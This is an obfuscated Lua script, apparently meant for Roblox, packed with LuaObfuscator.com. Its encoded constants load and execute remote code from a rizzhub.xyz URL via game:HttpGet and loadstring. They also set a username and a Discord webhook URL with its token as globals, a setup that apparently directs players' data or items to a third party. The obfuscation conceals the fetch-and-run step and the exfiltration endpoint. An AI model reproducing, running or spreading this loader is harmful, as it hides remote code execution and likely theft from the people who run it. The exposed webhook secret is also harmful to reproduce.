--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v30=nil;function v30(v31,v32,v33)local v34=v31[1];local v35=v31[2];local v36=v31[3];return function(...)local v66=1;local v67= -1;local v68={...};local v69=v12("#",...) -1 ;local function v70()local v73=v34;local v74=v35;local v75=v36;local v76=v28;local v77={};local v78={};local v79={};for v89=29 -(25 + 4) ,v69 do if ((v89>=v75) or ((28 + 149)==(2057 -(238 + 70)))) then v77[v89-v75 ]=v68[v89 + 1 + 0 ];else v79[v89]=v68[v89 + (242 -(146 + 95)) ];end end local v80=(v69-v75) + (1390 -(189 + 1200)) ;local v81;local v82;while true do local v90=0 + 0 ;local v91;while true do if (((0 + 0)==v90) or ((9950 -7536)>=(2891 + (969 -551)))) then v91=531 -(157 + 374) ;while true do if (((32 + 152)<=((15686 -9470) -(959 + 672))) and (v91==(1 -0))) then if (((9676 -7556)>(4008 -2597)) and (v82<=(11 -7))) then if (((929 + 550)<((5905 -(256 + 249)) -((2221 -1314) + 1047))) and (v82<=(1 + 0))) then if ((3426>(2452 -((509 -(46 + 330)) + 1344))) and (v82>((1487 -(1043 + 444)) + 0))) then local v121=0 -0 ;local v122;local v123;local v124;local v125;local v126;while true do if (((2635 + 1210)>=((4179 -(1443 + 127)) -745)) and ((1 + 0)==v121)) then v124=nil;v125=nil;v121=2 -0 ;end if (((6368 -(15160 -11361))>((2705 -(47 + 99)) -(32 + (1914 -1507)))) and (v121==(0 -0))) then v122=1924 -(1640 + 39 + 245) ;v123=nil;v121=1324 -(160 + 1163) ;end if ((v121==(3 -1)) or ((6771 -(1627 + 345))<=565)) then v126=nil;while true do if (((1626 -(1353 -946))<(2975 + 356)) and ((0 -0)==v122)) then local v155=(317 + 1019) -(617 + 719) ;local v156;while true do if ((((1467 -(1186 + 281)) + (0 -0))==v155) or ((3603 -1694)<=(753 + 478))) then v156=0 -0 ;while true do if ((v156==(0 -0)) or ((10670 -7009)<=1157)) then local v171=0;while true do if ((((4250 -(112 + 399)) -(9 + 3 + (263 -205)))>=(2504 -(849 + 1018))) and (v171==(746 -(284 + 462)))) then v123=v81[(926 -(608 + 316)) -0 ];v124,v125=v76(v79[v123](v13(v79,v123 + 1 + (0 -0) ,v81[597 -(37 + 557) ])));v171=1;end if ((v171==(1 + 0)) or ((1018 -(94 + 202))==(3784 -(8 + 121)))) then v156=1 + 0 ;break;end end end if ((v156==(1 + 0)) or ((5794 -(2370 + 919))>=(9720 -(6559 -(722 + 76))))) then v122=162 -(112 + 49) ;break;end end break;end end end if (((896 + (4230 -3054))<(2743 + 556)) and (v122==(1 + 0))) then local v157=0 + 0 ;while true do if (((1647 + 611)<=(334 + 4148)) and (v157==(3 -2))) then v122=6 -4 ;break;end if (((5011 -((941 -(301 + 117)) + 723))>(9443 -7013)) and (v157==(0 -0))) then local v162=945 -((1898 -(417 + 906)) + 370) ;while true do if (((4894 -(199 + 46))>=(2451 -1411)) and (v162==((24 + 240) -(70 + 194)))) then v67=(v125 + v123) -(1 + 0) ;v126=0 -0 ;v162=1 + 0 ;end if ((v162==(1 + (0 -0))) or ((2414 -916)==(1765 + 2872))) then v157=1;break;end end end end end if (((5006 -3094)<=(163 + 1900)) and ((9 -7)==v122)) then for v160=v123,v67 do local v161=0;while true do if ((v161==(0 -0)) or ((817 + (5022 -3340))<(343 + 1905))) then v126=v126 + ((7 -5) -1) ;v79[v160]=v124[v126];break;end end end break;end end break;end end else local v127=307 -(22 + 285) ;local v128;local v129;while true do if ((((2878 -1698) -(90 + 277))>=(215 + 459)) and (v127==(0 -0))) then v128=0 -(0 -0) ;v129=nil;v127=1 + 0 ;end if ((v127==1) or ((1236 + 3460)<(998 -(187 + 126)))) then while true do if ((v128==(0 -(0 -0))) or ((1280 -932)>(3668 + 572))) then v129=v81[1363 -(235 + 1126) ];v79[v129]=v79[v129](v13(v79,v129 + (1005 -(797 + 207)) ,v67));break;end end break;end end end elseif (((1948 -(936 + 808))<(3678 -2012)) and (v82<=(2 + 0))) then v79[v81[8 -6 ]]=v33[v81[2 + 1 ]];elseif (((2983 -(139 + 512))<=(1536 + 1507)) and (v82>(4 -1))) then v66=v81[(721 -(361 + 354)) -3 ];else v79[v81[2 -0 ]]=v81[4 -1 ];end elseif ((v82<=(1658 -(1512 + (490 -351)))) or ((18898 -14166)<=(4921 -(546 + 89)))) then if ((v82<=(1927 -(316 + 1390 + 216))) or ((818 -510)>(1445 + 2576))) then local v132=0 -0 ;local v133;local v134;local v135;local v136;while true do if (((7 -5)==v132) or ((1232 -(259 + 41))>(15143 -11390))) then while true do if (((3362 -(1402 + 347))<=(3931 -(446 + 1366))) and (v133==(149 -(147 + (3 -1))))) then v134=0 -(706 -(497 + 209)) ;v135=nil;v133=629 -(23 + 605) ;end if ((v133==(3 -2)) or (688>=(3318 -(1154 + (2273 -1757))))) then v136=nil;while true do if ((v134==(1 + 0)) or ((4923 -2499)<(2108 + 144))) then v79[v135 + 1 ]=v136;v79[v135]=v136[v81[606 -(174 + 428) ]];break;end if (((3276 + 53 + 293)>=(2929 -((1981 -(608 + 680)) + 626))) and ((1821 -(1200 + 621))==v134)) then local v166=0 + (1443 -(1213 + 230)) ;local v167;while true do if (((2337 -(786 + (737 -(165 + 389))))<=(4073 -(159 + 1189))) and (v166==(1693 -(1217 + 476)))) then v167=1666 -(1130 + 536) ;while true do if (((72 + 402)<(837 + 404)) and (v167==(0 + 0))) then v135=v81[1379 -(14 + 1363) ];v136=v79[v81[9 -6 ]];v167=1782 -(6 + 3 + 1772) ;end if ((v167==(1 + 0)) or ((3592 + 461)==((2857 -(40 + 1246)) -994))) then v134=1236 -(1061 + 174) ;break;end end break;end end end end break;end end break;end if ((0==v132) or (((930 -(27 + 13)) + 2506)==(5820 -(299 + 1366)))) then v133=904 -(470 + 434) ;v134=nil;v132=1100 -(64 + 1035) ;end if (((1294 + 29)<(7397 -(16703 -11528))) and (v132==(1 + 0))) then v135=nil;v136=nil;v132=3 -1 ;end end elseif ((v82==(10 -4)) or ((5143 -(63 + 1084))>=(10293 -6126))) then do return;end elseif (((8893 -6089)<(15617 -11055)) and (v79[v81[(1717 -(207 + 454)) -((2388 -(961 + 772)) + 399) ]]==v81[3 + 1 ])) then v66=v66 + (2 -1) ;else v66=v81[4 -1 ];end elseif ((v82<=(41 -(15 + 18))) or (((5112 -(665 + 325)) -(751 + 200))==(820 + 2432))) then v33[v81[2 + 1 ]]=v79[v81[1585 -(1230 + 353) ]];elseif ((v82==((4 -2) + 7)) or ((10982 -6662)<(3853 -(883 + 368 + 326)))) then v79[v81[2]]();else v79[v81[2 -0 ]]=v81[8 -(2 + 3) ]~=0 ;end v66=v66 + 1 + 0 + 0 ;break;end if (((6336 -(1289 + 120))>=(5968 -3900)) and (v91==(0 -0))) then local v103=0;while true do if ((v103==(0 + 0)) or ((1154 + 36)>(3098 -1691))) then local v107=0 -0 ;while true do if ((v107==(2 -1)) or ((2844 -1028)<384)) then v103=(3 -2) + 0 ;break;end if (((1335 -(1289 + (143 -97)))==v107) or ((4922 -(957 + 482))<(75 + 274))) then v81=v73[v66];v82=v81[793 -(540 + 252) ];v107=1 + 0 ;end end end if (((3634 -(1135 + 215))<=(12552 -8702)) and (v103==(1 + 0))) then v91=1;break;end end end end break;end end end end A,B=v28(v11(v70));if  not A[1] then local v92=0;local v93;while true do if (v92==0) then v93=v31[4][v66] or "?" ;error("Script error at ["   .. v93   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end return v30(v29(),{},v17)(...);end if (v18==1) then function v21(v37,v38,v39)if v39 then local v83=(v37/((1 + 1)^(v38-(704 -(435 + 268)))))%(((2 -1) + 1)^(((v39-(1 + 0)) -(v38-(1 + 0))) + 1 + 0)) ;return v83-(v83%(1 + 0)) ;else local v84=0;local v85;while true do if ((0 -0)==v84) then v85=2^(v38-(3 -2)) ;return (((v37%(v85 + v85))>=v85) and (1 + 0)) or (0 -0) ;end end end end v22=nil;function v22()local v40=v1(v16,v19,v19);v19=v19 + 1 ;return v40;end v23=nil;v18=2;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v41)if (v1(v41,2)==79) then v20=v0(v3(v41,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v41,16));if v20 then local v101=0;local v102;while true do if (v101==0) then v102=v5(v87,v20);v20=nil;v101=1;end if (1==v101) then return v102;end end else return v87;end break;end end end end);v21=nil;v18=1;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v42=1738 -(1736 + 2) ;local v43;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v42~=(0 + 0)) then else local v94=322 -(148 + 174) ;while true do if (v94==(0 -0)) then v43=0 -0 ;v44=nil;v94=1;end if (v94~=1) then else v42=1 -0 ;break;end end end if (v42~=(2 + 1)) then else v49=nil;while true do local v96=0 -0 ;while true do if (v96==1) then if (v43==(0 + 0)) then local v104=0 -0 ;while true do if ((750 -(341 + 408))==v104) then v46={};v43=1 + 0 ;break;end if (v104==(322 -(40 + 282))) then v44={};v45={};v104=1 + 0 ;end end end if (v43==2) then local v105=0 -0 ;while true do if (v105==(2 -1)) then for v109=1 + 0 ,v24() do local v110=0 -0 ;local v111;while true do if (v110==(1853 -(1259 + 594))) then v111=v22();if (v21(v111,1,3 -2 )==(0 -0)) then local v145=0 -0 ;local v146;local v147;local v148;local v149;local v150;local v151;while true do if (v145==(523 -(254 + 267))) then v150=nil;v151=nil;v145=3;end if (v145==(1 + 0)) then v148=nil;v149=nil;v145=3 -1 ;end if (v145==3) then while true do if (v146==2) then v151=nil;while true do if (v147~=(1 + 1)) then else while true do if (v148==(1 -0)) then local v179=0 -0 ;local v180;local v181;while true do if (v179~=(2 -1)) then else while true do if (v180~=(1086 -(797 + 289))) then else v181=0 + 0 ;while true do if (v181~=(519 -(162 + 356))) then else v148=318 -(83 + 233) ;break;end if (v181==(0 -0)) then local v190=0 -0 ;while true do if (v190~=0) then else v151={v23(),v23(),nil,nil};if (v149==(0 -0)) then local v195=177 -(172 + 5) ;local v196;local v197;while true do if (v195==0) then v196=0;v197=nil;v195=1 + 0 ;end if ((1136 -(293 + 842))~=v195) then else while true do if (v196==(0 + 0)) then v197=38 -(28 + 10) ;while true do if (v197==(0 + 0)) then v151[832 -(21 + 808) ]=v23();v151[1995 -(591 + 1400) ]=v23();break;end end break;end end break;end end elseif (v149==(1317 -(622 + 694))) then v151[5 -2 ]=v24();elseif (v149==(6 -4)) then v151[3]=v24() -(2^(183 -(90 + 77))) ;elseif (v149==(8 -5)) then local v200=0 -0 ;while true do if (v200==(1877 -(539 + 1338))) then v151[3 -0 ]=v24() -((4 -2)^(2 + 14)) ;v151[3 + 1 ]=v23();break;end end end v190=1702 -(570 + 1131) ;end if (v190~=(239 -(198 + 40))) then else v181=1 + 0 ;break;end end end end break;end end break;end if (v179==(0 -0)) then v180=0 + 0 ;v181=nil;v179=1587 -(1110 + 476) ;end end end if (v148==(3 + 0)) then if (v21(v150,10 -7 ,733 -(66 + 664) )~=(1 + 0)) then else v151[5 -1 ]=v49[v151[4]];end v44[v109]=v151;break;end if ((0 + 0)==v148) then local v183=0 + 0 ;while true do if (v183==(1 + 0)) then v148=1 + 0 ;break;end if (0==v183) then v149=v21(v111,2 + 0 ,3);v150=v21(v111,1 + 3 ,1528 -(379 + 1143) );v183=1 + 0 ;end end end if (v148==(1 + 1)) then local v184=0 + 0 ;while true do if (v184==(2 -1)) then v148=3 + 0 ;break;end if (v184~=0) then else local v187=1018 -(480 + 538) ;while true do if (v187==1) then v184=1 + 0 ;break;end if (v187==(492 -(269 + 223))) then local v189=0 + 0 ;while true do if (v189==(133 -(61 + 72))) then if (v21(v150,96 -(13 + 82) ,1751 -(1638 + 112) )==(1 + 0)) then v151[2]=v49[v151[667 -(201 + 464) ]];end if (v21(v150,2,2 + 0 )==(2 -1)) then v151[587 -(15 + 569) ]=v49[v151[3]];end v189=1;end if (v189==(1581 -(1527 + 53))) then v187=1;break;end end end end end end end end break;end if (v147~=0) then else local v172=0;local v173;while true do if (v172==(0 + 0)) then v173=0 -0 ;while true do if (v173==(374 -(338 + 36))) then v148=0;v149=nil;v173=1 + 0 ;end if (1==v173) then v147=3 -2 ;break;end end break;end end end if (v147~=(1 -0)) then else local v174=427 -(245 + 182) ;local v175;while true do if (v174==(0 -0)) then v175=0;while true do if (v175~=(0 -0)) then else local v188=25 -(21 + 4) ;while true do if ((207 -(181 + 25))~=v188) then else v175=62 -(50 + 11) ;break;end if (v188~=0) then else v150=nil;v151=nil;v188=1 + 0 ;end end end if (v175==(3 -2)) then v147=2 -0 ;break;end end break;end end end end break;end if (v146~=(1865 -(1194 + 670))) then else v149=nil;v150=nil;v146=6 -4 ;end if (v146==0) then local v168=0 -0 ;while true do if (v168==(1422 -(174 + 1247))) then v146=2 -1 ;break;end if (v168~=(0 + 0)) then else v147=0 -0 ;v148=nil;v168=2 -1 ;end end end end break;end if (v145==(898 -(292 + 606))) then v146=0;v147=nil;v145=1 + 0 ;end end end break;end end end v43=1 + 2 ;break;end if ((0 + 0)~=v105) then else for v112=186 -(117 + 68) ,v48 do local v113=549 -(15 + 534) ;local v114;local v115;local v116;while true do if (v113~=(1 -0)) then else v116=nil;while true do if ((1 + 0)~=v114) then else if (v115==(1 -0)) then v116=v22()~=(1236 -(520 + 716)) ;elseif (v115==(1 + 1)) then v116=v25();elseif (v115==(609 -(258 + 348))) then v116=v26();end v49[v112]=v116;break;end if (v114==(0 -0)) then local v154=575 -(276 + 299) ;while true do if (v154~=(0 -0)) then else v115=v22();v116=nil;v154=1 + 0 ;end if (v154==(1 + 0)) then v114=1 + 0 ;break;end end end end break;end if (v113~=(236 -(222 + 14))) then else v114=1573 -(399 + 1174) ;v115=nil;v113=1;end end end v47[3]=v22();v105=1 + 0 ;end end end break;end if (v96==(0 -0)) then if ((3 + 0)==v43) then local v106=0 -0 ;while true do if (v106==(1184 -(658 + 525))) then return v47;end if (v106==(1055 -(698 + 357))) then for v117=265 -(94 + 170) ,v24() do v45[v117-1 ]=v29();end for v119=3 -2 ,v24() do v46[v119]=v24();end v106=1659 -(1274 + 384) ;end end end if (v43==(1201 -(1031 + 169))) then v47={v44,v45,nil,v46};v48=v24();v49={};v43=2;end v96=1 + 0 ;end end end break;end if (v42==(1737 -(1690 + 45))) then v47=nil;v48=nil;v42=145 -(112 + 30) ;end if (v42==1) then local v95=270 -(168 + 102) ;while true do if (v95~=(0 -0)) then else v45=nil;v46=nil;v95=2 -1 ;end if (v95==(1 -0)) then v42=4 -2 ;break;end end end end end v18=5;end if (v18==2) then function v23()local v50,v51=v1(v16,v19,v19 + 1 + 1 );v19=v19 + (454 -(311 + 141)) ;return (v51 * (667 -411)) + v50 ;end v24=nil;function v24()local v52,v53,v54,v55=v1(v16,v19,v19 + (1505 -(1333 + 169)) );v19=v19 + (617 -(13 + 600)) ;return (v55 * ((14506112 -(36 + 1427)) + 2272567)) + (v54 * (37308 + 28228)) + (v53 * (32 + 224)) + v52 ;end v25=nil;v18=3;end if (v18==3) then function v25()local v56=1432 -(975 + 457) ;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v56==((463 + 50) -(287 + 226))) then v57=v24();v58=v24();v56=1;end if (v56==2) then v61=v21(v58,6 + (880 -(730 + 135)) ,1286 -(1164 + 91) );v62=((v21(v58,25 + 7 )==(1 + 0)) and  -(1 -0)) or 1 ;v56=10 -7 ;end if (v56==(1 -0)) then v59=1 + 0 ;v60=(v21(v58,2 -1 ,42 -(44 -22) ) * ((1 + 1)^(817 -(155 + 630)))) + v57 ;v56=1 + 1 ;end if (v56==3) then if (v61==(0 -0)) then if (v60==(0 + (1531 -(53 + 1478)))) then return v62 * 0 ;else v61=1 + (0 -0) ;v59=0 + 0 ;end elseif (v61==(7225 -5178)) then return ((v60==(1077 -((2899 -2144) + 322))) and (v62 * ((1 + 0)/(0 + 0)))) or (v62 * NaN) ;end return v8(v62,v61-(611 + 412) ) * (v59 + (v60/((6 -4)^(134 -82)))) ;end end end v26=nil;function v26(v63)local v64;if  not v63 then local v88=0 + 0 ;while true do if (v88==(0 + 0)) then v63=v24();if (v63==((543 -(410 + 133)) + 0)) then return "";end break;end end end v64=v3(v16,v19,(v19 + v63) -(1 -0) );v19=v19 + v63 ;local v65={};for v71=1, #v64 do v65[v71]=v2(v1(v3(v64,v71,v71)));end return v6(v65);end v27=v24;v18=4;end end end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403243O00682O7470733A2O2F72692O7A6875622E78797A2F736372697074732F4D61696E2E6C756103083O00557365724E616D65030C3O004A6F7368755O61353403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039362O3934382O312O36313236323O382F64587069576841554850486739443748316B7444777A53426F4D687944522O33706F427345414D376936623469314B5F674D444653716F52654D6C6B2D6968764A47754F00153O0012033O00013O0026073O000C00010002002O043O000C0001001202000100033O001202000200043O002005000200020005001203000400064O000A000500014O0001000200056O00013O00022O0009000100010001002O043O001400010026073O000100010001002O043O00010001001203000100083O001208000100073O0012030001000A3O001208000100093O0012033O00023O002O043O000100012O00063O00017O00153O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
